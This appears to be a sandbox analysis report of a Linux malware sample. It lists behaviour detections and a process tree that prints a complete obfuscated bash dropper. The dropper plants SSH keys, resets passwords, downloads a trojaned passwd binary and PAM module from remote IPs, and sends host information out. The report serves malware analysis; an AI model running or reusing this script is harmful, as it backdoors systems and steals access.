File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/790/maps /usr/sbin/needrestart N/A
File opened for reading /proc/792/maps /usr/sbin/needrestart N/A
File opened for reading /proc/593/maps /usr/sbin/needrestart N/A
File opened for reading /proc/756/maps /usr/sbin/needrestart N/A
File opened for reading /proc/763/maps /usr/sbin/needrestart N/A
File opened for reading /proc/778/maps /usr/sbin/needrestart N/A
File opened for reading /proc/339/maps /usr/sbin/needrestart N/A
File opened for reading /proc/586/maps /usr/sbin/needrestart N/A
File opened for reading /proc/785/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/788/maps /usr/sbin/needrestart N/A
File opened for reading /proc/811/maps /usr/sbin/needrestart N/A
File opened for reading /proc/815/maps /usr/sbin/needrestart N/A
File opened for reading /proc/757/maps /usr/sbin/needrestart N/A
File opened for reading /proc/772/maps /usr/sbin/needrestart N/A
File opened for reading /proc/810/maps /usr/sbin/needrestart N/A
File opened for reading /proc/863/maps /usr/sbin/needrestart N/A
File opened for reading /proc/390/maps /usr/sbin/needrestart N/A
File opened for reading /proc/420/maps /usr/sbin/needrestart N/A
File opened for reading /proc/442/maps /usr/sbin/needrestart N/A
File opened for reading /proc/591/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/27/environ /usr/sbin/needrestart N/A
File opened for reading /proc/30/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1084/status /usr/bin/pkill N/A
File opened for reading /proc/36/cgroup /usr/bin/pkill N/A
File opened for reading /proc/420/status /usr/bin/pkill N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/390/status /usr/sbin/needrestart N/A
File opened for reading /proc/2496/stat /usr/sbin/needrestart N/A
File opened for reading /proc/192/ctty /usr/bin/pkill N/A
File opened for reading /proc/1960/stat /usr/bin/pkill N/A
File opened for reading /proc/123/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1977/cgroup /usr/bin/pkill N/A
File opened for reading /proc/201/status /usr/bin/pkill N/A
File opened for reading /proc/792/stat /usr/bin/pkill N/A
File opened for reading /proc/25/stat /usr/bin/pkill N/A
File opened for reading /proc/2576/cgroup /usr/bin/pkill N/A
File opened for reading /proc/258/status /usr/bin/pkill N/A
File opened for reading /proc/420/ctty /usr/bin/pkill N/A
File opened for reading /proc/1916/ctty /usr/bin/pkill N/A
File opened for reading /proc/29/status /usr/bin/pkill N/A
File opened for reading /proc/31/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2005/stat /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/1084/ctty /usr/bin/pkill N/A
File opened for reading /proc/1122/stat /usr/bin/pkill N/A
File opened for reading /proc/1694/cmdline /usr/bin/pkill N/A
File opened for reading /proc/785/stat /usr/bin/pkill N/A
File opened for reading /proc/790/status /usr/bin/pkill N/A
File opened for reading /proc/191/status /usr/bin/pkill N/A
File opened for reading /proc/387/ctty /usr/bin/pkill N/A
File opened for reading /proc/56/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1794/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2162/cgroup /usr/bin/pkill N/A
File opened for reading /proc/202/ctty /usr/bin/pkill N/A
File opened for reading /proc/6/cgroup /usr/bin/pkill N/A
File opened for reading /proc/15/ctty /usr/bin/pkill N/A
File opened for reading /proc/756/status /usr/bin/pkill N/A
File opened for reading /proc/19/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2193/status /usr/bin/pkill N/A
File opened for reading /proc/2551/stat /usr/sbin/needrestart N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/40/ctty /usr/bin/pkill N/A
File opened for reading /proc/390/status /usr/bin/pkill N/A
File opened for reading /proc/757/stat /usr/bin/pkill N/A
File opened for reading /proc/1712/status /usr/bin/pkill N/A
File opened for reading /proc/1122/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1813/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1095/cmdline /usr/bin/pkill N/A
File opened for reading /proc/29/cmdline /usr/bin/pkill N/A
File opened for reading /proc/52/ctty /usr/bin/pkill N/A
File opened for reading /proc/2204/status /usr/bin/pkill N/A
File opened for reading /proc/511/status /usr/bin/pkill N/A
File opened for reading /proc/1926/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/47/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1950/status /usr/sbin/needrestart N/A
File opened for reading /proc/1058/root/usr/lib/python3.12/_threading_local.py /usr/sbin/needrestart N/A
File opened for reading /proc/2497/ctty /usr/bin/pkill N/A
File opened for reading /proc/28/ctty /usr/bin/pkill N/A
File opened for reading /proc/193/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1065/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2496/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2497/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1964/stat /usr/sbin/needrestart N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A
N/A N/A /usr/bin/apt-get N/A

Processes

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c exec '/tmp/xrx/init0' "$@" /tmp/xrx/init0]

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$uHz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/xrx/init0]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

